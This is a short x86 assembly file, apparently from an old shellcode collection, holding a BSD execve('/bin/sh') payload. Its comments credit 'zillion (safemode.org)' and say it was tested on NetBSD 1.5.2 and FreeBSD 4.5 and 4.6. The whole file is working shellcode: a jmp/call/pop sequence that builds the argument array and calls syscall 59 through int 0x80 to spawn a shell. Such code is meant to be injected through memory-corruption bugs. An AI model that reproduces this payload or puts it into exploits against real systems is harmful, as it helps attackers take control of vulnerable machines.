; 
; NetBSD /bin/sh execve assembly tested to work on 1.5.2
; Written by zillion (safemode.org)
; 
; This code also works on FreeBSD (tested 4.5 and 4.6)
; 


BITS 32

jmp short       callit
doit:

xor             eax, eax
pop             esi
mov byte        [esi + 7], al
lea             ebx, [esi]
mov long        [esi + 8], ebx
mov long        [esi + 12], eax
push            eax
lea             ecx, [esi + 8]
push            ecx
push            esi
mov             al,59
push            eax
int             0x80

callit:
call            doit

db              '/bin/sh#'